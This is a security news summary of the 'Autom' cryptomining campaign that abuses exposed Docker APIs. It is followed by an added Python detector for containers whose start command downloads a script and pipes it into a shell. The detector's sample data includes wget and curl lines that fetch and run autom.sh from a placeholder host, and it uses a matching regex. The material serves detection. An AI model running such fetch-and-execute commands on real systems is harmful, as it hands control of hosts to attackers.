Cryptomining Attack Exploits Docker API Misconfiguration Since 2019 (Security News, December 2021)

The attack is script-based and has been dubbed "Autom" after the shell script it relies on, "autom.sh".
Attackers have consistently abused the same Docker API misconfiguration throughout the campaign's active period; what has varied is the evasion tactics, which have allowed the adversaries to fly under the radar, Aquasec's research arm, Team Nautilus, wrote in a report published Wednesday.
Attackers hit honeypots set up by Team Nautilus 84 times since 2019, with 22 attacks in 2019, 58 in 2020, and four in 2021 before researchers began writing up their report in October, researchers said.
Although the attackers have used the same entry point and tactics throughout to reach their ultimate goal of cryptomining, what has changed most over the years is the evasive maneuvers they use to avoid detection, which the threat actors have evolved constantly, researchers said.
Since the campaign began, the attackers have also used five different servers from which to download the shell script that initiates the attack, they said.
Team Nautilus first observed the attack in 2019, when a malicious command was executed during the run of the vanilla image alpine:latest, which downloaded the autom.sh script.
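As an added example (not code from the article or from Team Nautilus), the following Python check inspects a Docker Engine API GET /containers/json listing for the launch pattern described above: a container, typically from the stock alpine:latest image, whose start command fetches a remote shell script and pipes it straight into a shell. The JSON sample is constructed, and the host 203.0.113.10 is a placeholder address.

```python
import json
import re

# Constructed sample in the shape of the Docker Engine API's GET /containers/json
# response, limited to the fields the check uses. Not real observations.
SAMPLE_CONTAINERS_JSON = json.dumps([
    {"Id": "aaa111", "Names": ["/web"], "Image": "nginx:1.21",
     "Command": "nginx -g 'daemon off;'"},
    {"Id": "bbb222", "Names": ["/quizzical_hopper"], "Image": "alpine:latest",
     "Command": "sh -c 'wget -q -O- http://203.0.113.10/autom.sh | sh'"},
    {"Id": "ccc333", "Names": ["/build"], "Image": "alpine:latest",
     "Command": "sh -c 'apk add --no-cache curl && curl -s http://203.0.113.10/autom.sh | sh'"},
    {"Id": "ddd444", "Names": ["/tooling"], "Image": "alpine:latest",
     "Command": "sleep infinity"},
])

# A downloader (curl/wget) whose output is handed directly to a shell interpreter.
# The middle class stops at |, ; and & so "apk add curl && ..." alone does not match.
_FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|ash)\b")


def suspicious_containers(containers_json):
    """Return one finding per container whose start command downloads a script
    and pipes it into a shell. The image is reported too, so a stock
    alpine:latest container (as in the honeypot observations) stands out
    from a purpose-built image that legitimately runs a bootstrap script."""
    findings = []
    for c in json.loads(containers_json):
        match = _FETCH_AND_RUN.search(c.get("Command", ""))
        if match:
            findings.append({
                "id": c["Id"],
                "name": c.get("Names", ["?"])[0].lstrip("/"),
                "image": c.get("Image", "?"),
                "stock_image": c.get("Image") == "alpine:latest",
                "downloader": match.group(1),
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_containers(SAMPLE_CONTAINERS_JSON):
        print(f)
```

On a live host the same function can be fed the output of `curl --unix-socket /var/run/docker.sock http://localhost/containers/json`; a daemon that answers the equivalent request on a TCP port without TLS client authentication is the misconfiguration the campaign depends on.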
News URL
https://threatpost.com/cryptomining-attack-exploits-docker-api-misconfiguration-since-2019/177299/